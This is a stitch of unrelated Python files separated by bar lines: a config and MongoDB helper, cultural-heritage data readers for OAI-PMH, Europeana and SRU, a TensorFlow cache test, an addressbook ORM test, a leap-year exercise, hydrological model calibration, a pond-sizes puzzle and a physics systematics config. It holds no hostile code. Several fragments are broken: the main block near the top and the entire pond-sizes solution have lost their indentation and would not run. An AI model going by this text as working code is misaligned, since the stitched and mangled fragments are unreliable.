        raw_value = self.get(section, option)
        return [piece.strip() for piece in raw_value.split(sep) if piece]

    def get_sdk_versions(self, section: str, option: str, *args, **kwargs) -> List[str]:
        """Return the option parsed as a list of SDKVersion objects."""
        names = self.getlist(section, option, *args, **kwargs)
        return [SDKVersion.from_str(name) for name in names]
class PathTypeEncoder(bson.codec_options.TypeEncoder):
    """BSON type encoder that stores pathlib.PosixPath values as plain strings."""
    python_type = pathlib.PosixPath
    def transform_python(self, value: pathlib.PosixPath) -> str:
        return str(value)
# Register the custom encoder so documents written through these
# codec_options may contain Path values.
path_codec = PathTypeEncoder()
custom_codecs = [path_codec]
type_registry = bson.codec_options.TypeRegistry(custom_codecs)
codec_options = bson.codec_options.CodecOptions(type_registry=type_registry)
# kudos to: https://medium.com/@ramojol/python-context-managers-and-the-with-statement-8f53d4d9f87
class MongoConnection(object):
    """Context manager wrapping a pymongo connection.

    On enter it connects and exposes ``self.db`` (database) and ``self.col``
    (collection, opened with this module's custom codec_options); on exit
    the connection is closed.
    """
    def __init__(
        self,
        host="localhost",
        port="27017",
        database="javacard-analysis",
        collation="commands",
    ):
        # NOTE(review): 'collation' here appears to mean 'collection';
        # the name is kept for compatibility. Port is a string because it is
        # interpolated into the connection URI.
        self.host = host
        self.port = port
        self.connection = None
        self.db_name = database
        self.collation_name = collation
    def __enter__(self, *args, **kwargs):
        conn_str = f"mongodb://{self.host}:{self.port}"
        log.debug("Starting the connection with %s", conn_str)
        self.connection = pymongo.MongoClient(conn_str)
        self.db = self.connection[self.db_name]
        self.col = self.db.get_collection(
            self.collation_name, codec_options=codec_options
        )
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        log.debug("Closing the connection to the database")
        self.connection.close()
def get_user_consent(message, question):
    """Print ``message`` and keep asking ``question`` until the user answers.

    Returns True for an answer starting with 'y', False for one starting
    with 'n' (case-insensitive); anything else re-prompts.
    """
    print(message)
    prompt = question + " [Y/n] "
    while True:
        reply = input(prompt).lower().strip()
        if reply.startswith("y"):
            return True
        if reply.startswith("n"):
            return False
def proc_to_dict(proc: subprocess.CompletedProcess) -> dict:
    """
    Turns `subprocess.CompletedProcess` into a dictionary.

    ``args`` and ``returncode`` are copied verbatim; ``stdout``/``stderr``
    are decoded from UTF-8 bytes. Attributes that are missing (or that are
    not bytes) are silently left out, as before.
    """
    result = {
        attr: getattr(proc, attr)
        for attr in ("args", "returncode")
        if hasattr(proc, attr)
    }
    for stream in ("stdout", "stderr"):
        try:
            result[stream] = getattr(proc, stream).decode("utf8")
        except AttributeError:
            continue
    return result
if __name__ == "__main__":
app = CommandLineApp()
app.run()
|
from .epi_model import EpiModel
from .strat_model import StratifiedModel
from .utils import *
|
"""This module provides a range of readers for accessing local and remote resources.
All readers return their data as :class:`~polymatheia.data.NavigableDict`.
"""
import json
import os
from csv import DictReader
from deprecation import deprecated
from lxml import etree
from requests import get
from sickle import Sickle
from srupy import SRUpy
from polymatheia import __version__
from polymatheia.data import NavigableDict, NavigableDictIterator, LimitingIterator, xml_to_navigable_dict
class OAIMetadataFormatReader(object):
    """The class:`~polymatheia.data.reader.OAIMetadataFormatReader` is a container for OAI-PMH MetadataFormat.

    The underlying library automatically handles the continuation parameters, allowing for simple iteration.
    """

    def __init__(self, url):
        """Construct a new class:`~polymatheia.data.reader.OAIMetadataFormatReader`.

        :param url: The base URL of the OAI-PMH server
        :type url: ``str``
        """
        self._url = url

    def __iter__(self):
        """Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
        def as_dict(meta_format):
            # Project only the three fields of interest from the sickle object.
            return {'schema': meta_format.schema,
                    'metadataPrefix': meta_format.metadataPrefix,
                    'metadataNamespace': meta_format.metadataNamespace}
        return NavigableDictIterator(Sickle(self._url).ListMetadataFormats(), mapper=as_dict)
class OAISetReader(object):
    """The class:`~polymatheia.data.reader.OAISetReader` is an iteration container for OAI-PMH Sets.

    The underlying library automatically handles the continuation parameters, allowing for simple iteration.
    """

    def __init__(self, url):
        """Construct a new class:`~polymatheia.data.reader.OAISetReader`.

        :param url: The base URL of the OAI-PMH server
        :type url: ``str``
        """
        self._url = url
        # BUG FIX: the constructor previously also stored an unused
        # ``Sickle(url).ListSets()`` iterator, firing an immediate network
        # request whose result was never read. ``__iter__`` builds its own
        # iterator, matching the sibling reader classes.

    def __iter__(self):
        """Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
        return NavigableDictIterator(Sickle(self._url).ListSets(),
                                     mapper=lambda oai_set: {'setSpec': oai_set.setSpec, 'setName': oai_set.setName})
class OAIRecordReader(object):
    """The :class:`~polymatheia.data.reader.OAIRecordReader` is an iteration container for OAI-PMH Records.

    The underlying library automatically handles the continuation parameters, allowing for simple iteration.
    """
    def __init__(self, url, metadata_prefix='oai_dc', max_records=None, set_spec=None):
        """Construct a new :class:`~polymatheia.data.reader.OAIRecordReader`.

        :param url: The base URL of the OAI-PMH server
        :type url: ``str``
        :param metadata_prefix: The metadata prefix to use for accessing data
        :type metadata_prefix: ``str``
        :param max_records: The maximum number of records to return. Default (``None``) returns all records
        :type max_records: ``int``
        :param set_spec: The OAI Set specification for limiting which metadata to fetch
        :type set_spec: ``str``
        """
        self._url = url
        self._metadata_prefix = metadata_prefix
        self._set_spec = set_spec
        self._max_records = max_records
    def __iter__(self):
        """Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator.

        If ``max_records`` is set, then the class:`~polymatheia.data.NavigableDictIterator` is wrapped in a
        class:`~polymatheia.data.LimitingIterator`. Deleted records are
        skipped (``ignore_deleted=True``); each record's raw XML is parsed
        (comments stripped) and converted to a NavigableDict.
        """
        it = NavigableDictIterator(Sickle(self._url).ListRecords(metadataPrefix=self._metadata_prefix,
                                                                 set=self._set_spec,
                                                                 ignore_deleted=True),
                                   mapper=lambda record: xml_to_navigable_dict(etree.fromstring(
                                       record.raw,
                                       parser=etree.XMLParser(remove_comments=True))))
        if self._max_records is not None:
            it = LimitingIterator(it, self._max_records)
        return it
class JSONReader():
    """The :class:`~polymatheia.data.reader.JSONReader` is a container for reading JSON files from the filesystem.

    It is designed to provide access to data serialised using the :class:`~polymatheia.data.writer.JSONWriter`.

    .. important::

       It does **not** guarantee that the order of records is the same as the order in which they were written
       to the local filesystem.
    """

    def __init__(self, directory):
        """Create a new :class:`~polymatheia.data.reader.JSONReader`.

        :param directory: The base directory within which to load the files
        :type directory: ``str``
        """
        self._directory = directory
        # Collect every *.json file below the base directory, depth-first.
        self._filelist = [
            os.path.join(basepath, filename)
            for basepath, _, filenames in os.walk(directory)
            for filename in filenames
            if filename.endswith('.json')
        ]

    def __iter__(self):
        """Return a new :class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
        return NavigableDictIterator(iter(self._filelist), mapper=self._load)

    def _load(self, filename):
        """Return the next file as a :class:`~polymatheia.data.NavigableDict`."""
        with open(filename) as in_f:
            return json.load(in_f)
@deprecated(deprecated_in='0.2.0', removed_in='1.0.0', current_version=__version__,
            details='Replaced by the polymatheia.data.reader.JSONReader')
class LocalReader(JSONReader):
    """Deprecated. Use :class:`~polymatheia.data.reader.JSONReader`."""
    # Kept only as a backwards-compatible alias; behaviour is inherited
    # unchanged from JSONReader.
    pass
class XMLReader():
    """The :class:`~polymatheia.data.reader.XMLReader` is a container for reading XML files from the local filesystem.

    The :class:`~polymatheia.data.reader.XMLReader` will only load files that have a ".xml" extension.
    """
    def __init__(self, directory):
        """Create a new :class:`~polymatheia.data.reader.XMLReader`.

        :param directory: The base directory within which to load the files
        :type directory: ``str``
        """
        self._directory = directory
        self._filelist = []
        # Collect every *.xml file below the base directory, depth-first.
        for basepath, _, filenames in os.walk(directory):
            for filename in filenames:
                if filename.endswith('.xml'):
                    self._filelist.append(os.path.join(basepath, filename))
    def __iter__(self):
        """Return a new :class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
        return NavigableDictIterator(iter(self._filelist),
                                     mapper=self._load)
    def _load(self, filename):
        """Return the next file as a :class:`~polymatheia.data.NavigableDict` (XML comments stripped)."""
        with open(filename) as in_f:
            return xml_to_navigable_dict(etree.parse(in_f, parser=etree.XMLParser(remove_comments=True)).getroot())
class EuropeanaSearchReader(object):
    """The :class:`~polymatheia.data.reader.EuropeanaSearchReader` provides access to the Europeana Search API.

    The initial search is run immediately on creating a new :class:`~polymatheia.data.reader.EuropeanaSearchReader`.
    The iterator will automatically paginate through the full set of result pages.

    .. attribute:: result_count
       :type: ``int``

       The total number of records returned by the search.

    .. attribute:: facets
       :type: ``list`` of :class:`~polymatheia.data.NavigableDict`

       The facets generated by the search. This is only set if the ``profile`` parameter is set to ``'facets'``.
    """
    def __init__(self, api_key, query, max_records=None, query_facets=None, media=None, thumbnail=None,
                 reusability=None, profile=None):
        """Create a new :class:`~polymatheia.data.reader.EuropeanaSearchReader`.

        :param api_key: The Europeana API key
        :type api_key: ``str``
        :param query: The query string
        :type query: ``str``
        :param max_records: The maximum number of records to return. Defaults to all records
        :type max_records: ``int``
        :param query_facets: The list of query facets to apply to the search
        :type query_facets: ``list`` of ``str``
        :param media: Whether to require that matching records have media attached. Defaults to no requirement
        :type media: ``bool``
        :param thumbnail: Whether to require that matching records have a thumbnail. Defaults to no requirement
        :type thumbnail: ``bool``
        :param reusability: The reusability (rights) to require. Defaults to no limits
        :type reusability: ``str``
        :param profile: The result profile to request. Defaults to ``'standard'``
        :type profile: ``str``
        """
        self._api_key = api_key
        self._query = query
        self._max_records = max_records
        # NOTE(review): _cursor/_offset mirror the iterator's state but are
        # never read in this class -- candidates for removal.
        self._cursor = '*'
        self._offset = 0
        self._query_facets = query_facets
        self._media = media
        self._thumbnail = thumbnail
        self._reusability = reusability
        self._profile = profile
        # Run the first search eagerly (network request!) so result_count and
        # facets are available immediately after construction.
        it = iter(self)
        self.result_count = it.result_count
        self.facets = it.facets
    def __iter__(self):
        """Return a fresh :class:`~polymatheia.data.reader.EuropeanaSearchIterator` as the iterator."""
        return EuropeanaSearchIterator(self._api_key, self._query, self._max_records, self._query_facets, self._media,
                                       self._thumbnail, self._reusability, self._profile)
class EuropeanaSearchIterator(object):
    """The :class:`~polymatheia.data.reader.EuropeanaSearchIterator` provides an iterator for the Europeana Search API.

    The initial search is run immediately on creating a new :class:`~polymatheia.data.reader.EuropeanaSearchIterator`.
    The iterator will automatically paginate through the full set of result pages.

    .. attribute:: result_count
       :type: ``int``

       The total number of records returned by the search.

    .. attribute:: facets
       :type: ``list`` of :class:`~polymatheia.data.NavigableDict`

       The facets generated by the search. This is only set if the ``profile`` parameter is set to ``'facets'``.
    """
    def __init__(self, api_key, query, max_records=None, query_facets=None, media=None, thumbnail=None,
                 reusability=None, profile=None):
        """Create a new :class:`~polymatheia.data.reader.EuropeanaSearchIterator`.

        :param api_key: The Europeana API key
        :type api_key: ``str``
        :param query: The query string
        :type query: ``str``
        :param max_records: The maximum number of records to return. Defaults to all records
        :type max_records: ``int``
        :param query_facets: The list of query facets to apply to the search
        :type query_facets: ``list`` of ``str``
        :param media: Whether to require that matching records have media attached. Defaults to no requirement
        :type media: ``bool``
        :param thumbnail: Whether to require that matching records have a thumbnail. Defaults to no requirement
        :type thumbnail: ``bool``
        :param reusability: The reusability (rights) to require. Defaults to no limits
        :type reusability: ``str``
        :param profile: The result profile to request. Defaults to ``'standard'``
        :type profile: ``str``
        """
        self._api_key = api_key
        self._query = query
        self._max_records = max_records
        # '*' is the Europeana cursor value for "first page".
        self._cursor = '*'
        self._offset = 0
        self._query_facets = query_facets
        self._media = media
        self._thumbnail = thumbnail
        self._reusability = reusability
        self._profile = profile
        self.result_count = 0
        self.facets = None
        # Fetch the first page eagerly (network request).
        self._run_search()
    def __iter__(self):
        """Return this :class:`~polymatheia.data.reader.EuropeanaSearchIterator`` as the iterator."""
        return self
    def __next__(self):
        """Return the next record as a :class:`~polymatheia.data.NavigableDict``.

        :raises StopIteration: If no more Records are available
        """
        # Decrement the remaining-record budget; stop once it is used up.
        if self._max_records is not None:
            self._max_records = self._max_records - 1
            if self._max_records < 0:
                raise StopIteration()
        try:
            return NavigableDict(next(self._it))
        except StopIteration:
            # Current page exhausted: fetch the next page if results remain.
            if self._offset < self.result_count:
                self._run_search()
                return NavigableDict(next(self._it))
            else:
                raise StopIteration()
    def _run_search(self):
        """Run the actual search query (one page, via cursor-based pagination)."""
        params = [('wskey', self._api_key),
                  ('query', self._query),
                  ('cursor', self._cursor)]
        # Page size: at most 50 (the API maximum), or fewer if the remaining
        # budget is smaller.
        if self._max_records and self._max_records < 50:
            params.append(('rows', self._max_records))
        else:
            params.append(('rows', 50))
        if self._query_facets:
            params.extend([('qf', qf) for qf in self._query_facets])
        if self._media is not None:
            params.append(('media', 'true' if self._media else 'false'))
        if self._thumbnail is not None:
            params.append(('thumbnail', 'true' if self._thumbnail else 'false'))
        if self._reusability is not None:
            params.append(('reusability', self._reusability))
        if self._profile is not None:
            params.append(('profile', self._profile))
        response = get('https://api.europeana.eu/record/v2/search.json', params=params)
        if response.status_code == 200:
            data = response.json()
            self._it = iter(data['items'])
            self.result_count = data['totalResults']
            self._offset = self._offset + data['itemsCount']
            # 'nextCursor' is absent on the last page; the stale cursor is
            # then never used because _offset >= result_count stops iteration.
            if 'nextCursor' in data:
                self._cursor = data['nextCursor']
            if 'facets' in data:
                self.facets = [NavigableDict(facet) for facet in data['facets']]
        else:
            raise Exception(response.json()['error'])
class CSVReader(object):
    """The :class:`~polymatheia.data.reader.CSVReader` provides access to a CSV file."""

    def __init__(self, source):
        """Create a new :class:`~polymatheia.data.reader.CSVReader`.

        :param source: The source to load the CSV from. Can either be a ``str`` filename or a file-like object
        """
        if isinstance(source, str):
            # newline='' is required by the csv module so that newlines embedded
            # in quoted fields are parsed correctly.
            self._file = open(source, newline='')
        else:
            self._file = source

    def __iter__(self):
        """Return this :class:`~polymatheia.data.reader.CSVReader` as the iterator."""
        if self._file.seekable():
            # Rewind so repeated iteration always starts from the first row.
            self._file.seek(0)
        return NavigableDictIterator(iter(DictReader(self._file)))
class SRUExplainRecordReader(object):
    """The :class:`~polymatheia.data.reader.SRUExplainRecordReader` is a container for SRU Explain Records."""

    def __init__(self, url):
        """Construct a new :class:`~polymatheia.data.reader.SRUExplainRecordReader`.

        :param url: The base URL of the SRU server
        :type url: ``str``
        """
        self._url = url
        # Fetch the server's Explain record immediately.
        self._explain = SRUpy(self._url).explain()
        # (name, title) pairs for every record schema the server advertises.
        self.schemas = [(schema["@name"], schema.title)
                        for schema in NavigableDict(self._explain).explain.schemaInfo.schema]
        # Request parameters echoed back by the server.
        self.echo = NavigableDict(self._explain.echo)

    def __iter__(self):
        """Return a new :class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
        # Each (key, value) pair of the Explain record is mapped to a one-entry dict.
        return NavigableDictIterator(iter(self._explain),
                                     mapper=lambda record: {record[0]: record[1]}
                                     )
class SRURecordReader(object):
    """The :class:`~polymatheia.data.reader.SRURecordReader` is an iteration container for Records fetched via SRU.

    The underlying library (SRUpy) automatically handles the continuation parameters, allowing for simple iteration.
    """

    def __init__(self, url, query, max_records=None, record_schema="dc", **kwargs):
        """Construct a new :class:`~polymatheia.data.reader.SRURecordReader`.

        :param url: The base URL of the SRU endpoint
        :type url: ``str``
        :param query: The query string
        :type query: ``str``
        :param max_records: The maximum number of records to return
        :type max_records: ``int``
        :param record_schema: Schema in which records will be returned. Defaults to Dublin Core schema.
        :type record_schema: ``str``
        :param kwargs: Additional request parameters that will be sent to the SRU server
        """
        self._url = url
        self._query = query
        self._max_records = max_records
        self._record_schema = record_schema
        self._kwargs = kwargs
        # Populated lazily when iteration starts (see __iter__).
        self.record_count = None
        self.echo = None

    def __iter__(self):
        """Return a new :class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
        sru_records = SRUpy(self._url).get_records(query=self._query,
                                                   maximumRecords=self._max_records,
                                                   recordSchema=self._record_schema,
                                                   **self._kwargs)
        self.record_count = sru_records.number_of_records
        if sru_records.echo:
            self.echo = NavigableDict(sru_records.echo)
        # Parse each record's raw XML into a NavigableDict, stripping XML comments.
        return NavigableDictIterator(sru_records,
                                     mapper=lambda record: xml_to_navigable_dict(
                                         etree.fromstring(
                                             record.raw,
                                             parser=etree.XMLParser(remove_comments=True)
                                         )
                                     ))

    @staticmethod
    def result_count(url, query):
        """Return result count for the given query.

        :param url: The base URL of the SRU endpoint
        :type url: ``str``
        :param query: The query string
        :type query: ``str``
        """
        # Request a single record; only the reported total hit count is used.
        return SRUpy(url).get_records(query=query, maximumRecords=1).number_of_records
|
import os
import tempfile
import numpy as np
import tensorflow as tf
from absl.testing import parameterized
from kblocks.data import cache, snapshot
from kblocks.data.cache import save_load_cache, tfrecords_cache
os.environ["TF_DETERMINISTIC_OPS"] = "1"
def as_array(dataset: "tf.data.Dataset") -> np.ndarray:
    """Materialise every element of an eager dataset into a single NumPy array."""
    values = []
    for element in dataset:
        values.append(element.numpy())
    return np.array(values)
# Dataset-transform factories under test: each maps a directory path to a
# tf.data transform that caches the dataset at that location.
# NOTE(review): grouped as lazy vs eager per their names; the split is not
# otherwise used in this file -- confirm against kblocks.data.
lazy_factories = (
    cache,
    snapshot,
)
eager_factories = (
    tfrecords_cache,
    save_load_cache,
)
# All factories are exercised by the parameterized test below.
factories = lazy_factories + eager_factories
class CacheTest(tf.test.TestCase, parameterized.TestCase):
    @parameterized.parameters(*factories)
    def test_cache_transform(self, factory):
        """Caching a randomly-augmented dataset must freeze its values.

        After caching, repeated passes must return identical values and must
        not advance the RNG beyond the single epoch used to build the cache.
        """
        seed = 0
        epoch_length = 5
        rng = tf.random.Generator.from_seed(seed)
        # Each element draws from rng, so two un-cached passes give different values.
        dataset = tf.data.Dataset.range(epoch_length).map(
            lambda x: tf.cast(x, tf.float32) + rng.uniform(())
        )
        expected = as_array(dataset)
        # RNG state after exactly one epoch of draws.
        state = rng.state.numpy()
        # Sanity check: without caching, a second pass yields different values.
        assert np.all(expected != as_array(dataset))
        rng.reset_from_seed(seed)
        with tempfile.TemporaryDirectory() as tmp_dir:
            cached = dataset.apply(factory(tmp_dir))
            np.testing.assert_equal(cached.cardinality().numpy(), epoch_length)
            # Two passes over the cache must both reproduce the first epoch.
            for _ in range(2):
                np.testing.assert_equal(as_array(cached), expected)
            # The RNG advanced exactly one epoch, i.e. the map ran only once.
            np.testing.assert_equal(rng.state.numpy(), state)
# Run the test suite when executed directly.
if __name__ == "__main__":
    tf.test.main()
|
from model.details import Details
import random
from model.group import Group
from fixture.orm import ORMFixture
# ORM fixture connected directly to the test database; used only for verification.
dba = ORMFixture(host="127.0.0.1", name="addressbook", user="root", password="")


def test_add_contact_to_group(app, db):
    """Add a random contact to a random group and verify via the ORM."""
    # Ensure at least one contact exists before sampling.
    if len(db.get_contact_list()) == 0:
        app.contact.create(Details(firstname="firstname", middlename="middlename", lastname="test", nickname="test"))
    old_contacts = db.get_contact_list()
    # Ensure at least one group exists before sampling.
    if len(db.get_group_list()) == 0:
        app.group.create(Group(name="test"))
    contact = random.choice(old_contacts)
    group_list = db.get_group_list()
    group = random.choice(group_list)
    app.contact.add_contact_to_group(contact.id, group.id)
    # Re-read the group's members through the ORM and check the contact landed there.
    new_group_list = list(dba.get_contacts_in_group(Group(id=group.id)))
    assert contact in new_group_list
|
# Python Exercise 32: read a year and report whether it is a leap year (bissexto).
from datetime import date


def eh_bissexto(ano):
    """Return True when *ano* is a leap year in the Gregorian calendar.

    Leap years are divisible by 4, except century years, which must also be
    divisible by 400.
    """
    return ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0


if __name__ == '__main__':
    # Guarding the prompt makes the module importable (and testable) without blocking on stdin.
    ano = int(input('Informe um ano para descobrir se é BISSEXTO, caso queira tester o ano atual digite 0: '))
    if ano == 0:
        # 0 is a sentinel meaning "use the current year".
        ano = date.today().year
    if eh_bissexto(ano):
        print(f'O ano {ano} é BISSEXTO')
    else:
        print(f'O ano {ano} NÃO é BISSEXTO')
#!/usr/bin/env python
# Programmer(s): Sopan Patil.
# This file is part of the 'hydroutils' package.
import numpy
import copy
######################################################################
class Calibration(object):
    """ The 'Calibration' class contains the following two methods for model calibration:
    (1) Particle Swarm Optimisation
    (2) Monte-Carlo Optimisation

    Parameter-set objects must expose an 'objval' attribute; for PSO they must
    additionally provide an 'updateparameters(personal_best, swarm_best, w)'
    method that perturbs the parameter set in place, and 'objval' must be
    initialised before calling (it is read before the first assignment).
    """

    @staticmethod
    def pso_maximise(model, params, obsdata, objf, calperiods_obs, calperiods_sim):
        """ This method optimises a user provided model by maximising the user provided
        objective function with the Particle Swarm Optimisation algorithm.

        Args:
            (1) model: Instance of the user provided model. The class file of user's model MUST
                contain a method called 'simulate' which is used to run the model.
            (2) params: List of the instances of user provided model parameter sets.
            (3) obsdata: Time-series of the observed data (that will be compared with simulated data).
            (4) objf: Method from the ObjectiveFunction class specifying the objective function.
            (5) calperiods_obs: Two element array (or list) specifying the index values of the start
                and end data points of calibration period for the observed data.
            (6) calperiods_sim: Two element array (or list) specifying the index values of the start
                and end data points of calibration period for the simulated data.

        Returns:
            The parameter set with the highest objective function value found.
        """
        # PSO algorithm parameters
        npart = len(params)  # No. of particles in a PSO swarm
        niter = 50           # Maximum number of swarm iterations allowed
        ertol = 1e-3         # Error tolerance for considering no optimisation improvement
        maxiter = 5          # Maximum swarm iterations allowed with no optimisation improvement
        nstp = 0             # Consecutive iterations without improvement
        winit = 0.9          # Initial inertia weight
        wend = 0.4           # Final inertia weight (w decays linearly towards this)
        w = winit
        objmax = numpy.zeros(niter)
        paramsbst = copy.deepcopy(params)
        # BUGFIX: deep-copy the initial swarm best. The previous code aliased
        # params[0], so the in-place updateparameters() call on params[0]
        # silently mutated the recorded swarm-best parameter set.
        paramsmax = copy.deepcopy(params[0])
        # Start PSO
        for j in range(niter):
            for i in range(npart):
                # Simulate the model
                simdata = model.simulate(params[i])
                # Calculate the objective function value of simulation
                params[i].objval = objf(obsdata[calperiods_obs[0]:calperiods_obs[1]+1],
                                        simdata[calperiods_sim[0]:calperiods_sim[1]+1])
                # If the particle has improved upon its own best objective function
                if params[i].objval > paramsbst[i].objval:
                    # copy parameter set
                    paramsbst[i] = copy.deepcopy(params[i])
                # If the particle has improved upon entire swarm's objective function
                if params[i].objval > paramsmax.objval:
                    # copy parameter set
                    paramsmax = copy.deepcopy(params[i])
                # Update the parameter values (moves the particle in place)
                params[i].updateparameters(paramsbst[i], paramsmax, w)
            objmax[j] = paramsmax.objval
            print('Swarm iteration:', j+1, ', Best objfun value:', objmax[j])
            if j > 0:
                # Count no. of swarm iterations with no objective function value improvement
                abser = objmax[j] - objmax[j-1]
                if abser < ertol:
                    nstp += 1
                else:
                    nstp = 0
                # Stop the optimisation if maximum swarm iterations have been
                # reached without any improvement in the objective function value
                if nstp == maxiter:
                    break
            # Linearly decay the inertia weight towards wend
            w -= ((winit - wend)/(niter - 1))
        return paramsmax

    # ----------------------------------------------------------------

    @staticmethod
    def montecarlo_maximise(model, params, obsdata, objf, calperiods_obs, calperiods_sim):
        """ This method optimises a user provided model by maximising the user provided
        objective function with the MonteCarlo Optimisation algorithm.

        Args:
            (1) model: Instance of the user provided model. The class file of user's model MUST
                contain a method called 'simulate' which is used to run the model.
            (2) params: List of the instances of user provided model parameter sets.
            (3) obsdata: Time-series of the observed data (that will be compared with simulated data).
            (4) objf: Method from the ObjectiveFunction class specifying the objective function.
            (5) calperiods_obs: Two element array (or list) specifying the index values of the start
                and end data points of calibration period for the observed data.
            (6) calperiods_sim: Two element array (or list) specifying the index values of the start
                and end data points of calibration period for the simulated data.

        Returns:
            A deep copy of the best-scoring parameter set (None if *params* is empty).
        """
        # BUGFIX: track the running best explicitly instead of aliasing params[0].
        # The previous alias meant the comparison at i == 0 compared params[0]
        # with itself, and the returned object shared state with the input list.
        paramsmax = None
        niter = len(params)  # No. of iterations
        # Start Monte-Carlo iterations
        for i in range(niter):
            # Simulate the model
            simdata = model.simulate(params[i])
            # Calculate the objective function value of simulation
            params[i].objval = objf(obsdata[calperiods_obs[0]:calperiods_obs[1]+1],
                                    simdata[calperiods_sim[0]:calperiods_sim[1]+1])
            # If current parameter set has improved upon previous maximum objective function value
            if paramsmax is None or params[i].objval > paramsmax.objval:
                # copy parameter set
                paramsmax = copy.deepcopy(params[i])
            print('Iteration:', i+1, ', Best objfun value:', paramsmax.objval)
        return paramsmax
######################################################################
|
"""
Pond Sizes: You have an integer matrix representing a plot of land, where the value at that location
represents the height above sea level. A value of zero indicates water. A pond is a region of water
connected vertically, horizontally, or diagonally. The size of the pond is the total number of
connected water cells. Write a method to compute the sizes of all ponds in the matrix.
EXAMPLE
Input:
0 2 1 0
0 1 0 1
1 1 0 1
0 1 0 1
Output: 2, 4, 1 (in any order)
(16.19, p515)
"""
def _pond_size(land, i, j):
# check index out of bounds and base case: no water here or cell is visited
if i < 0 or j < 0 or i >= len(land) or j >= len(land[0]) or land[i][j] != 0:
return 0
size = 1
land[i][j] = -1 # mark visited
for di in range(-1, 2):
for dj in range(-1, 2):
if di == 0 and dj == 0:
continue
size += _pond_size(
land, i + di, j + dj
) # O(mn) space if all cells have water
return size
def pond_sizes(land):
"""Modified depth-first search. To avoid recounting cells, mark the cell as visited.
O(mn) time and O(mn) space, where m is number of rows and n is number of columns."""
res = []
if len(land) == 0 or len(land[0]) == 0:
return res
rows = len(land)
cols = len(land[0])
for i in range(rows):
for j in range(cols):
if land[i][j] == 0:
size = _pond_size(land, i, j)
res.append(size)
return res
|
"""
SystematicsConfig.py:
Centralization of common systematics configurations.
Original author: J. Wolcott (jwolcott@fnal.gov)
May 2014
"""
import itertools
import math
############################ Config Error Bands ########################
# Number of randomly shifted universes per systematic error band.
NUM_UNIVERSE = 100
# Whether to use the nu+e flux constraint (also decides the flux universe count below).
USE_NUE_CONSTRAINT = True
# PDG code of the analysis neutrino (14 = muon neutrino).
AnaNuPDG=14
# Number of flux universes.
NUM_FLUX_UNIVERSE = 200 if USE_NUE_CONSTRAINT else 100
# detector mass uncertainty
MASS_UNCERTAINTY = 0.014 # = 1.4% (it's fractional). Laura (Doc7615) says she got this from Ron (Doc6016).
# data EM scale shift in ECAL:
EM_ENERGY_SCALE_SHIFT_ECAL = -0.058 # downward 5.8%
# EM scale uncertainty in ECAL, HCAL; quoted from the nu+e paper.
EM_ENERGY_SCALE_UNCERTAINTY = {
    "ECAL": 0.015,
    "HCAL": 0.05
}
# Nominal beam angle (radians) and its angular uncertainties in x and y.
BEAM_ANGLE = math.radians(-3.3)
BEAM_XANGLE_UNCERTAINTY = 1*1e-3 #radians
BEAM_YANGLE_UNCERTAINTY = 0.9*1e-3 # radians
# Shower-leakage energy correction: 0.8% of the energy.
LEAKAGE_CORRECTION = lambda E: E*0.008
#LEAKAGE_CORRECTION = lambda E: 0
# Correction factor applied to available energy.
AVAILABLE_E_CORRECTION = 1.17
# NOTE(review): meaning/units of -10 are not evident from this file -- confirm.
LEAKAGE_SYSTEMATICS = -10
# electron angle uncertainty
# NOTE(review): this value is the muon angular resolution used as a stand-in -- confirm.
ELECTRON_ANGLE_UNCERTAINTY = 1e-3
#DEDX_ENERGY_SCALE_UNCERTAINTY = 0.015 # = 1.5% (still fractional). Based on eyeballing the dE/dx distribution for this analysis in the extra energy sideband.
#COHERENT_UNCERTAINTY = 0.2 # = 20% (fractional). Covers the measurement errors and residual difference between GENIE COH and MINERvA's measurement after the reweighting done in tools/Corrections.py
#COHERENT_EB_NAME = "CoherentModel"
#MYSTERY_ALT_EB_NAME = "MysteryProcessModel"
#SIDEBAND_MODEL_EB_NAME = "SidebandModel" # systematic addressing data-MC disagreement in EE sideband at low energy. used in BackgroundFitting.py
# GENIE reweighting knobs ("universes"); commented-out entries are handled elsewhere.
GENIE_UNIVERSES = [
    "AGKYxF1pi",
    "AhtBY",
    "BhtBY",
    "CCQEPauliSupViaKF",
    "CV1uBY",
    "CV2uBY",
    "EtaNCEL",
    "FrAbs_N",
    "FrAbs_pi",
    "FrCEx_N",
    "FrCEx_pi",
    "FrElas_N",
    "FrElas_pi",
    "FrInel_N",
    #"FrInel_pi",
    "FrPiProd_N",
    "FrPiProd_pi",
    "MFP_N",
    "MFP_pi",
    #"MaCCQE",
    #"MaCCQEshape",
    #"NormCCQE", these three are taken care of by a separate class
    "MaNCEL",
    "MaRES",
    "MvRES",
    "NormCCRES",
    "NormDISCC",
    "NormNCRES",
    "RDecBR1gamma",
    #"Rvn1pi",
    #"Rvp1pi", these two are taken care of by a separate class
    "Rvn2pi",
    "Rvp2pi",
    "Theta_Delta2Npi",
    "VecFFCCQEshape"
]
# Two non-standard genie knobs? should revisit in the future
#"efnucr_flat", "EFNUCR",
# minerva tune errorbands
UNIVERSES_2P2H = [1,2,3] #2p2h universe variations
RPA_UNIVERSES = {
    "HighQ2":[1,2],
    "LowQ2" :[3,4]
}
NonResPi=True
# Channel selection for the low-Q2 pion weight (CV and systematic variants).
LowQ2PiWeightChannel = None
LowQ2PiWeightSysChannel = ["JOINT","NUPI0"]
NumZExpansionUniverses = 0 #Means Don't use Zexpansion. 100 is default Z expansion
# Detector-response branches; each gets a "response_*" error band (see below).
RESPONSE_BRANCHES = [
    "p",
    "meson",
    "em",
    "other",
    "xtalk",
]
# Optionally split the neutron response into three energy ranges.
NEUTRON_RESPONSE = False
if NEUTRON_RESPONSE:
    RESPONSE_BRANCHES.extend([
        "low_neutron",
        "mid_neutron",
        "high_neutron"
    ])
# PDG codes for GEANT particle-interaction systematics (proton, neutron, pi+).
GEANT_PARTICLES = [
    2212,2112,211
]
# not all the variations are relevant for the PC excess samples
#PC_EXCESS_VARIATIONS = VARIATIONS[:]
#PC_EXCESS_VARIATIONS.remove("BirksUp")
